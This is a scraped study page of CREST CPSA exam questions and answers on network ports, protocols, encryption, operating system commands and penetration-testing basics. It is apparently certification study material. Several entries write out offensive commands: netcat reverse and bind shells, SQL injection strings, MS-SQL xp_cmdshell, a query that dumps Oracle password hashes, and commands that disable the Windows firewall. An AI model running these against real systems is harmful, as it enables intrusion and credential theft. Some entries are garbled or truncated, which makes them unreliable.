Network Protocols and Security Concepts, Exams of Network security

A wide range of network protocols, security concepts, and related topics. It provides detailed information on various network ports, protocols, encryption algorithms, file permissions, operating system versions, and more. The document serves as a comprehensive reference for network and security professionals, covering topics such as pop3, rpc, ntp, smb, irc, encryption algorithms, sql injections, linux commands, and network interface cards. It also includes information on relevant security standards, regulations, and best practices. The depth and breadth of the content make this document a valuable resource for understanding fundamental network and security principles.

Typology: Exams

2024/2025

Available from 10/28/2024

nancy-kimani
nancy-kimani šŸ‡¬šŸ‡§

4.1

(40)

2.9K documents

1 / 29

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
CREST CPSA QUESTIONS AND ANSWERS
TCP - ANSWER-Transmission Control Protocol
UDP - ANSWER-User Datagram Protocol
Port 21 - ANSWER-FTP
FTP - ANSWER-File Transfer Protocol
Port 22 - ANSWER-SSH
SSH - ANSWER-Secure Shell
Port 23 - ANSWER-Telnet
Port 25 - ANSWER-SMTP
SMTP - ANSWER-Simple Mail Transfer Protocol
Port 49 - ANSWER-TACACS
TACACS - ANSWER-Terminal Access Controller Access Control System
Port 53 - ANSWER-DNS
DNS - ANSWER-Domain Name System
Port 67 (UDP) - ANSWER-DHCP (Server)
Port 68 (UDP) - ANSWER-DHCP (Client)
DHCP - ANSWER-Dynamic Host Configuration Protocol
Port 69 (UDP) - ANSWER-TFTP
TFTP - ANSWER-Trivial File Transfer Protocol
Port 80 - ANSWER-HTTP
HTTP - ANSWER-Hypertext Transfer Protocol
pf3
pf4
pf5
pf8
pf9
pfa
pfd
pfe
pff
pf12
pf13
pf14
pf15
pf16
pf17
pf18
pf19
pf1a
pf1b
pf1c
pf1d

Partial preview of the text

Download Network Protocols and Security Concepts and more Exams Network security in PDF only on Docsity!

CREST CPSA QUESTIONS AND ANSWERS

TCP - ANSWER-Transmission Control Protocol UDP - ANSWER-User Datagram Protocol Port 21 - ANSWER-FTP FTP - ANSWER-File Transfer Protocol Port 22 - ANSWER-SSH SSH - ANSWER-Secure Shell Port 23 - ANSWER-Telnet Port 25 - ANSWER-SMTP SMTP - ANSWER-Simple Mail Transfer Protocol Port 49 - ANSWER-TACACS TACACS - ANSWER-Terminal Access Controller Access Control System Port 53 - ANSWER-DNS DNS - ANSWER-Domain Name System Port 67 (UDP) - ANSWER-DHCP (Server) Port 68 (UDP) - ANSWER-DHCP (Client) DHCP - ANSWER-Dynamic Host Configuration Protocol Port 69 (UDP) - ANSWER-TFTP TFTP - ANSWER-Trivial File Transfer Protocol Port 80 - ANSWER-HTTP HTTP - ANSWER-Hypertext Transfer Protocol

Port 88 - ANSWER-Kerberos Kerberos - ANSWER-A computer network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner Port 110 - ANSWER-POP POP3 - ANSWER-Post Office Protocol version 3 Port 111 - ANSWER-RPC RPC - ANSWER-Remote Procedure Call Port 123 - ANSWER-NTP NTP - ANSWER-Network Time Protocol Port 135 - ANSWER-Windows RPC (EPM) Port 593 - ANSWER-RPC over HTTPS Port 445 - ANSWER-SMB SMB - ANSWER-Server Message Block Port 137 (UDP) - ANSWER-NetBIOS (name services) Port 138 (UDP) - ANSWER-NetBIOS (datagram services) Port 139 - ANSWER-NetBIOS (session services) NetBIOS - ANSWER-Network Basic Input/Output System Port 143 - ANSWER-IMAP IMAP - ANSWER-Internet Message Access Protocol Port 161 (UDP) - ANSWER-SNMP SNMP - ANSWER-Simple Network Management Protocol Port 179 - ANSWER-BGP BGP - ANSWER-Border Gateway Protocol

Port 2049 - ANSWER-NFS NFS - ANSWER-Network File System Port 3128 - ANSWER-Squid Proxy Port 3306 - ANSWER-MySQL Port 3389 - ANSWER-RDP (Remote Desktop Protocol) Port 5060 - ANSWER-SIP SIP - ANSWER-Session Initiation Protocol Port 5222 - ANSWER-Jabber Port 5432 - ANSWER-Postgres Port 5666 - ANSWER-Nagios Postgres - ANSWER-An object-relational database management system with an emphasis on extensibility and standards compliance Nagios - ANSWER-Open source system monitoring service Port 5900 - ANSWER-VNC VNC - ANSWER-Virtual Network Computing Port 6000 - ANSWER-X X11 - ANSWER-A windowing system for bitmap displays, common on Unix- like operating systems. Provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard. Port 6129 - ANSWER-DameWare DameWare - ANSWER-Remote Access Software on port 6129 Port 6667 - ANSWER-IRC (Internet Relay Chat) Port 9001 - ANSWER-Tor Port 9001 - ANSWER-HSQL Port 9090 - ANSWER-Openfire

Port 9100 - ANSWER-Jet Direct Yersinia - ANSWER-Layer 2 testing tool (STP, CDP, VLAN Trunking, etc) STP - ANSWER-Spanning Tree Protocol CDP - ANSWER-Cisco Discovery Protocol DTP - ANSWER-Dynamic Trunking Protocol HSRP - ANSWER-Hot Standby Router Protocol VTP - ANSWER-VLAN Trunking Protocol fgdump - ANSWER-A utility for dumping passwords on Windows NT/2000/XP/2003 machines Reserved Internal IPs - ANSWER-10.0.0.0/8 (10.0.0.0-10.255.255.255) : Private 127.0.0.0/8 (127.0.0.0-127.255.255.255) : Local Host Loopback 172.16.0.0/12 (172.16.0.0-172.31.255.255) : Private 192.168.0.0/16 (192.168.0.0-192.168.255.255) : Private Symmetric Encryption - ANSWER-DES/3DES AES Twofis h Blowfis h Serpen t IDEA RC4, RC5, RC6 CAST Asymmetric Encryption - ANSWER- RSA El Gamal ECC Eliptic Curve Diffie-Helman (Key Exchange) Paillier Merkle- Helman Cramer- Shoup Hashes - ANSWER- MD5 SHA MySQL < 4.

' OR '1' =

' OR '1' =

SUBSCRIBE

NOTIFY

PUBLISH

INFO

REFER

MESSAGE

UPDATE

SMTP Requests - ANSWER- MAIL RCPT DATA SNMP Requests - ANSWER- Get GetNext Set GetBulk Respons e Trap Inform HTTP Status Codes - ANSWER-1xx - Info 2xx - Success 3xx - Redirection 4xx - Error 5xx - Server Error HTTP Status Code 404 - ANSWER-NOT FOUND the method is not available HTTP Status Code 301 - ANSWER-Moved Permanently HTTP Status Code 302 - ANSWER-Temporarily Moved HTTP Status Code 410 - ANSWER-Gone SQL Injections (Escape Characters) - ANSWER-' OR '1' = '1' -- SQL Injections (Type Handling) - ANSWER-1;DROPTABLE users Linux File Permissions - ANSWER-drwxrwxrwx 2 user(owner) group size date filename d | rwx | rwx | rwx Filetype | User | Group | Everyone Linux Command : Change Password - ANSWER-passwd

Linux Command : Find Files of Type - ANSWER-find. -type f - iname '.pdf' locate '.pdf' Linux File System Structure - ANSWER-/bin - User Binaries /boot - Bootup related files /dev - Interface for system devices /etc - System Config Files /home - Base directory for user files /lib - Critical software libraries /opt - Third party software /proc - System and running processes /root - Home for root /sbin - Sys Admin binaries /tmp - Temporary Files /usr - Less critical files /var - Variable system files IPTables - ANSWER-A user-space utility program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores Wireshark and TCPdump - ANSWER-Common packet analyzers. Allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached pfSense - ANSWER-Open source firewall/router computer software distribution based on FreeBSD Solaris Command : Process Listing - ANSWER-prstat -a Solaris Command : Services and Status - ANSWER-svcs -a Solaris Command: Start Service (Admin) - ANSWER-svcadm start NT 3.1 Versions - ANSWER-Windows NT 3.1 (All) NT 3.5 Versions - ANSWER-Windows NT 3.5 (All) NT 3.51 Versions - ANSWER-Windows NT 3.51 (All) NT 4.0 Versions - ANSWER-Windows NT 4.0 (All) NT 5.0 Versions - ANSWER-Windows 2000 (All)

nslookup - ANSWER-A network administration command-line tool for querying the Domain Name System (DNS) to obtain domain name or IP address mapping or for any other specific DNS record. IIS 1 Defaults - ANSWER-Windows NT Addon IIS 2 Defaults - ANSWER-NT 4. IIS 3 Defaults - ANSWER-NT 4 Service Pack IIS 4 Defaults - ANSWER-NT4 Option Pack IIS 5 Defaults - ANSWER-Windows 2000 IIS 5.1 Defaults - ANSWER-Windows XP IIS 6 Defaults - ANSWER-Windows Server 2003, Windows XP Pro IIS 7 Defaults - ANSWER-Windows Vista, Server 2008 IIS 7.5 Defaults - ANSWER-Windows 7, 2008 R IIS 8 Defaults - ANSWER-Windows Server 2012, Windows 8 IIS 8.5 Defaults - ANSWER-Windows Server 2012 R2, Windows 8. IIS 10 v 1607 Defaults - ANSWER-Windows Server 2016, Windows 10 Anniversary Update IIS 10 v 1709 Defaults - ANSWER-Windows 10 Fall Creators, v IIS 10 v 1809 Defaults - ANSWER-Windows Server 2019, Windows 10 October Update Windows Command : Disable Firewall - ANSWER-netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state off Sysinternals Suite - ANSWER-A set of powerful Windows administration applications used to view, troubleshoot, and modify Windows functions WMCI - ANSWER-Windows Management Instrumentation Command-Line WMCI Command : Execute Process - ANSWER-wmci process call create "process_name"

WMCI Command : Uninstall Software - ANSWER-wmci product get name /value wmci product where name="XX" call uninstall /nointeractive PCI Card Info Storage Common-Use - ANSWER-- Store card details (i.e CC number, expiry) in encrypted form

  • Store cardholder details (name, address, contact details...ie PII) in a SEPARATE encrypted database with a unique reference identifier linking the two -DO NOT STORE sensitive data (ie CVV2, CVV or CID values) Windows : Active Directory Default Location - ANSWER-C:\Windows\NTDS Ntds.dit is the physical storage file Windows : Domain Common Folders - ANSWER-C:\Windows\SYSVOL Contains Group Policies, Login Scripts, Staging Folders, etc. dsquery - ANSWER-Remote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain Classful IP Range : Class A - ANSWER-128 Networks (2^7), 16,777, Addresses per network (2^24) Range : 0.0.0.0-127.0.0. Default Subnet Mask : 255.0.0.0 CIDR Notation : / Classful IP Range : Class B - ANSWER-16,384 Networks (2^14), 65, Addresses per network (2^16) Range : 128.0.0.0-191.255.0. Default Subnet Mask : 255.255.0.0 CIDR Notation : / Classful IP Range : Class C - ANSWER-2,097,152 Networks (2^21), 256 Addresses per network (2^8) Range : 192.0.0.0-223.255.255. Default Subnet Mask : 255.255.255.0 CIDR Notation : / Classful IP Range Calculation - ANSWER-If the first bit is a "0", it's a class A address (Half the address space has a "0" for the first bit, so this is why class A takes up half the address space.)

Windows: nc 10.0.0.1 1234 -e cmd.exe (-e is execute and is not always supported) Netcat : Listen - ANSWER-nc -nlvp Netcat : Transfer Text or Binary Files - ANSWER-Listener : nc -nlvp 4444 > incoming.exe Sender: nc -nv IP to send to 4444 < file Netcat : Bind Shell - ANSWER-Listener: nc -nlvp 4444 -e cmd.exe (to set up cmd to run) Sender/ "Talker": nc -nv IP to connect to 4444 (this will execute the cmd.exe and all the "Talker" to connect to the host) Attacking Listener Netcat : Reverse Shell - ANSWER- Listener: nc -nlvp 4444 Sender: nc -nv IP to send to 4444 /bin/bash (sends shell!) Attacking Sender NMap : Scan Types - ANSWER--sP : ping scan -sS : syn scan ("half open" scan) -sT : connect scan (full TCP) -sU : UDP scan -sO : protocol scan Port Count - ANSWER-65,536 (2^16) Ports This applies to TCP AND UDP NMap : Scan EVERY Port - ANSWER-TCP: nmap -p- UDP: nmap -sU -p- NMap : Common Options - ANSWER--p1-65535 : Ports -T[0-5] : "Scan Speed", can help hide you -n : No DNS Resolution

-O : OS Detection -A : AGGRESSIVE -sV : Version Detection -PN : No Ping -6 : IPv6 Scan -oA : Output ALL types NMap : DNS Reverse Lookup - ANSWER-nmap -R -sL -dns-server Hash Lengths - ANSWER-MD5 : 16 Bytes SHA-1 : 20 bytes SHA-256 : 32 Bytes SHA-512 : 64 Bytes IIS - ANSWER-Microsoft Web Server Apache / Tomcat - ANSWER-Apache Web Servers GWS - ANSWER-Google Web Server Websphere - ANSWER-IBM Web Server Litespeed - ANSWER-LiteSpeed Tech Web Server MS-SQL : DB Version - ANSWER-SELECT @@version EXEC xp_msver (detailed version info) MS-SQL : Run OS Command - ANSWER-EXEC master..xp_cmdshell 'net user' MS-SQL : SELECT commands - ANSWER-SELECT HOST_NAME( ) : Hostname and IP SELECT DB_NAME ( ) : Current DB SELECT name FROM master..sysdatabases; : List DBs SELECT user_name ( ) : Current user SELECT name FROM master..syslogins : List users SELECT name FROM master..sysobjects WHERE xtype='U'; : List Tables

Oracle : SELECT Commands - ANSWER-SELECT * FROM v$version; : DB Version (SELECT version FROM v$instance;) SELECT instance_name FROM v$instance : Current DB (SELECT name FROM v$database;) SELECT DISTINCT owner FROM all_tables; : List DBs SELECT user FROM dual; : Current User SELECT username FROM all_users ORDER BY username; : List users SELECT column_name FROM all_tab_columns; : List Columns SELECT table_name FROM all_tables; : List Tables SELECT name, password, astatus FROM sys.user$; : List password hashes host.equiv (or .rhosts file) Structure - ANSWER-Allow any user to log in from any host:

Allow any user from host with a matching local account to log in: host Allow any user from host to log in: host + Allow user from host to log in as any non-root user: host user Allow all users with matching local accounts from host to log in except for baduser: host -baduser host Deny all users from host: -host Allow all users with matching local accounts on all hosts in a netgroup:

+@netgroup Disallow all users on all hosts in a netgroup: -@netgroup Allow all users in a netgroup to log in from host as any non-root user: host +@netgroup Allow all users with matching local accounts on all hosts in a netgroup except baduser: +@netgroup -baduser +@netgroup Linux Shell Breakouts - ANSWER-python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i Language Vulns : Java (OO) - ANSWER-Log Injection Deadlock Language-based Attacks Language Vulns : C (Function) - ANSWER-Code Injection Buffer Overflow Language Vulns : Objective-C (OO) - ANSWER-Code Insertion Malformation Race Conditions Language Vulns : C++ (OO) - ANSWER-Race Conditions Language Vulns: PHP - ANSWER-Incorrect Element Removal NIC - ANSWER-Network Interface Card Network Interface Card (NIC) - ANSWER-An expansion card that enables a computer to connect other computers or to a cable modem to facilitate a high-speed Internet connection. MAC - ANSWER-Media Access Control NAT - ANSWER-Network Address Translation

FQDN - ANSWER-Fully Qualified Domain Name IOC - ANSWER-Indications of Compromise POC - ANSWER-Point of Contact Proof of Concept SIEM - ANSWER-Security Information and Event Management MBSA - ANSWER-Microsoft Baseline Security Analyzer CAT5 - ANSWER-type of cable that has the ability to transfer information from one computer to another Ethernet - ANSWER-a system for connecting a number of computer systems to form a local area network, with protocols to control the passing of information and to avoid simultaneous transmission by two or more systems. Token Ring - ANSWER-A networking technology developed by IBM in the 1980s. It relies upon direct links between nodes and a ring topology, using tokens to allow nodes to transmit data. APIPA - ANSWER-Automatic Private Internet Protocol Addressing MTU - ANSWER-maximum transmission unit - The largest data unit a network (for example, Ethernet or token ring) will accept for transmission. Unicast - ANSWER-a message that is sent from a single sender to a single recipient Multicast - ANSWER-a form of transmission in which a message is delivered to a group of hosts Router Protocol - ANSWER-a protocol used between routers so that they can learn routes to add to their routing tables. Link State Routing - ANSWER-A routing method that floods routing information to all routers within a network to build and maintain a more complex network route database. Distance Vector Routing - ANSWER-Each router passes a copy of its routing table to its adjacent neighbors. The neighbor adds the route to its own table, incrementing the metric to reflect the extra distance to the end network. The distance is given as a hop count; the vector component specifies the address of the next hop.

Hybrid Routing - ANSWER-Routing protocol that uses the attributes of both distance vector and link state IGP - ANSWER-Interior Gateway Protocol Interior Gateway Protocol (IGP) - ANSWER-A routing protocol that operates within an autonomous system, which is a network under a single administrative control. Includes IGRP, EGRP, RIP, OSPF, and EIGRP EGP - ANSWER-Exterior Gateway Protocol Exterior Gateway Protocol (EGP) - ANSWER-A routing protocol that operates between autonomous systems, which are networks under different administrative control. Border Gateway Protocol (BGP) is the only one in widespread use today. IPv6 - ANSWER-A new protocol developed to replace IPv4, addressing the issue of IP address exhaustion. No broadcast, has Anycast instead. 128-bit in Hexidecimal MAC Address - ANSWER-A Media Access Control address is a hardware address that uniquely identifies each node on a network. Traditional MAC addresses are 12-digit (6 bytes, or 48 bits) hexadecimal numbers. Network Architectures - ANSWER-The design of a computer network; includes both physical and logical design. 10BaseT - ANSWER-LAN (Ethernet) 10 Mbps 100BaseT - ANSWER-"Fast Ethernet" 100 Mbps 1000BaseT - ANSWER-Gigabit Ethernet 1 GB Wireless Network - ANSWER-Any type of computer network that is not connected by cables of any kind.

Shared Media LAN - ANSWER-LAN that shares total bandwidth with all stations (ex. Token Ring)